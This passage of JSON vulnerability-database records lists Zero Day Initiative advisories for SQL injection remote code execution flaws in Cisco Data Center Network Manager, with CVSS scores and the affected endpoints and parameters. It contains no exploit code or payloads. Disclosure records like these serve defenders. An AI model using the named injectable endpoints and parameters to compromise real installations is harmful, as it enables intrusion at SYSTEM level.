"cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-060", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-060/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:40", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/getInterfacesBySwitch endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getInterfacesBySwitch SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-035", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-035/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:12", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getSwitchBandwidthStatList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanSwitchBandwidthStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-083", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-083/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:55", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/getHostEnclDataLength endpoint. When parsing the searchId parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getHostEnclDataLength SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-024", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-024/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:05", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/msm/sites service. When parsing the name parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager createSite SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-095", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-095/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:09", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbAdminWSService/DbAdminWS service. When parsing the second parameter of the modifyGroupName endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager modifyGroupName SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-087", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-087/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:33", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the getConfigBackupStatusCount endpoint of the WebAnalysisWSService/WebAnalysisWS service. When parsing the colFilterStr parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getBackupStatusCount SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-046", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-046/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:46", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/virtualportchannel/vpcwizard/history endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getVpcPeerHistory SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-023", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-023/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:08", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the ConfigTemplateWSService/ConfigTemplateWS service. When parsing the sortField parameter of the exportConfigDeliveryJobTable endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getTaskList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-088", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-088/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:05", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/msm/sites service. When parsing the ip parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager createSite getIp SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-094", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-094/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:39", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/isls endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getisls SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-036", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-036/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:37", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/topology endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getIslListWithPMForTopology SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-040", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-040/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:17", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getLanIslStatJoinList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanIslStatJoinList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-075", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-075/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:20", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getCpuStatDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getOidSanStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-068", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-068/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:30", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getSanIslStatJoinList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSanIslStatJoinList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-072", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-072/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:38", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS service. When parsing a packet to the getSwitchListWithPortUse SOAP endpoint, the process does not properly validate a user-supplied string for the sortType parameter before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanSwitchList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-038", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-038/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:35", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/customPGStat endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getCustomPGStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 